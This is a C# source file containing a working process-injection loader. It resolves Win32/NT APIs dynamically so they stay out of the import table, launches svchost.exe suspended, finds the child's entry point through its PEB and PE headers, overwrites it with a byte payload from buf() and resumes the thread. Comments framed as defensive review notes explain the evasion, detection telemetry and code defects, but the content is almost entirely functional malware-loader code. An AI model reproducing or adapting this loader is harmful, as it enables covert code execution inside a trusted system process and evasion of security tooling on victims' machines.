/// <summary>
/// Entry point. Resolves five Win32/NT APIs by address at runtime, launches
/// C:\windows\system32\svchost.exe with CREATE_SUSPENDED, walks the child's PEB
/// and PE headers to find its AddressOfEntryPoint, overwrites that location with
/// the byte array returned by <c>buf()</c>, and resumes the primary thread.
/// </summary>
/// <remarks>
/// Review notes (defensive):
/// - No [DllImport] is used: every API comes from Invoke.GetLibraryAddress +
///   Marshal.GetDelegateForFunctionPointer, so the binary's import table carries
///   no entry for CreateProcessA / ZwQueryInformationProcess / ReadProcessMemory /
///   WriteProcessMemory / ResumeThread and static import inspection will not see
///   them. The observable sequence — suspended child, cross-process write into the
///   child's image, ResumeThread — is what process-creation and remote-memory-write
///   telemetry should key on.
/// - Offsets assume a 64-bit target: PEB+0x10 (ImageBaseAddress) and
///   BitConverter.ToInt64 over an IntPtr.Size buffer; on a 32-bit build the buffer
///   is 4 bytes and ToInt64 would throw ArgumentException.
/// - Return values are largely ignored (see inline notes); a failure early in the
///   chain cascades into reads/writes against meaningless addresses rather than
///   an abort.
/// - pi.hProcess and pi.hThread are never closed (no CloseHandle in this method).
/// - args is unused.
/// </remarks>
static void Main(string[] args)
{
    // Runtime API resolution. Invoke.GetLibraryAddress and DELEGATES.* are
    // project-defined (not visible here). 'pointer' is not checked for IntPtr.Zero;
    // GetDelegateForFunctionPointer is expected to throw on a zero pointer rather
    // than return null — NOTE(review): confirm against the Invoke helper's failure mode.
    IntPtr pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA");
    DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
    pointer = Invoke.GetLibraryAddress("Ntdll.dll", "ZwQueryInformationProcess");
    DELEGATES.ZwQueryInformationProcess ZwQueryInformationProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ZwQueryInformationProcess)) as DELEGATES.ZwQueryInformationProcess;
    pointer = Invoke.GetLibraryAddress("kernel32.dll", "ReadProcessMemory");
    DELEGATES.ReadProcessMemory ReadProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ReadProcessMemory)) as DELEGATES.ReadProcessMemory;
    pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
    DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
    pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread");
    DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;

    // Zero-initialised native structs (STRUCTS.* are project-defined). si.cb is
    // never set, which CreateProcess normally expects — NOTE(review): verify the
    // STARTUPINFO definition initialises cb itself.
    STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO();
    STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
    STRUCTS.SECURITY_ATTRIBUTES lpa = new STRUCTS.SECURITY_ATTRIBUTES();
    STRUCTS.SECURITY_ATTRIBUTES lta = new STRUCTS.SECURITY_ATTRIBUTES();
    STRUCTS.PROCESS_BASIC_INFORMATION pbi = new STRUCTS.PROCESS_BASIC_INFORMATION();
    // Receives ZwQueryInformationProcess's ReturnLength; never read afterwards.
    uint temp = 0;

    // CREATE_SUSPENDED: the child exists but its primary thread does not run until
    // the ResumeThread call at the bottom. 'succ' is assigned but never tested (the
    // check below is commented out); on failure pi.hProcess is a zero handle and
    // every subsequent call operates on it.
    bool succ = CreateProcess(null, "C:\\windows\\system32\\svchost.exe", ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
    /* if (succ)
     * {
     *     Console.WriteLine("Process Created");
     *     Console.WriteLine(" |Process ID->" + pi.dwProcessId);
     * }
     */

    // Information class 0x0 = ProcessBasicInformation. The length IntPtr.Size * 6
    // corresponds to the six pointer-sized fields of PROCESS_BASIC_INFORMATION on
    // x64. The NTSTATUS stored in 'success' is never examined.
    UInt32 success = ZwQueryInformationProcess(pi.hProcess, 0x0, ref pbi, (uint)(IntPtr.Size * 6), ref temp);
    // PEB + 0x10 is ImageBaseAddress on x64 (the field sits at +0x08 on x86).
    IntPtr ptrToBaseImage = (IntPtr)((Int64)pbi.PebBaseAddress + 0x10);
    byte[] addrBuf = new byte[IntPtr.Size];
    IntPtr nread = IntPtr.Zero;
    // Reads the child's ImageBaseAddress pointer; 'succ' and 'nread' again unchecked.
    succ = ReadProcessMemory(pi.hProcess, ptrToBaseImage, addrBuf, addrBuf.Length, out nread);
    /* if (succ)
     * {
     *     Console.WriteLine("Process Read");
     * }
     */
    // ToInt64 requires 8 bytes in addrBuf — this ties the method to a 64-bit build.
    IntPtr processBase = (IntPtr)BitConverter.ToInt64(addrBuf, 0);

    // First 0x200 bytes of the mapped image: covers the DOS header and, for typical
    // e_lfanew values, the PE signature / file header / start of the optional
    // header. An unusually large e_lfanew would place 'opthdr' beyond the buffer
    // and ToUInt32 would throw. The return value of this read is discarded.
    byte[] data = new byte[0x200];
    ReadProcessMemory(pi.hProcess, processBase, data, data.Length, out nread);
    // IMAGE_DOS_HEADER.e_lfanew lives at offset 0x3c.
    uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3c);
    // +0x28 = 4 (PE\0\0 signature) + 20 (IMAGE_FILE_HEADER) + 16 (offset of
    // AddressOfEntryPoint within IMAGE_OPTIONAL_HEADER).
    uint opthdr = e_lfanew_offset + 0x28;
    uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr);
    // RVA -> virtual address inside the child.
    IntPtr addressofentrypoint = (IntPtr)(entrypoint_rva + (UInt64)processBase);

    // Overwrites the child's entry point with the bytes from buf(). buf() is
    // evaluated twice (once for the data, once for Length); neither the BOOL
    // result nor 'nread' is inspected. This cross-process write into another
    // process's image is the event memory-protection and EDR telemetry flag.
    WriteProcessMemory(pi.hProcess, addressofentrypoint, buf(), buf().Length, out nread);
    // The primary thread now begins execution at the overwritten entry point.
    // Return value (previous suspend count, or -1 on failure) is not checked, and
    // the process/thread handles are leaked.
    ResumeThread(pi.hThread);
}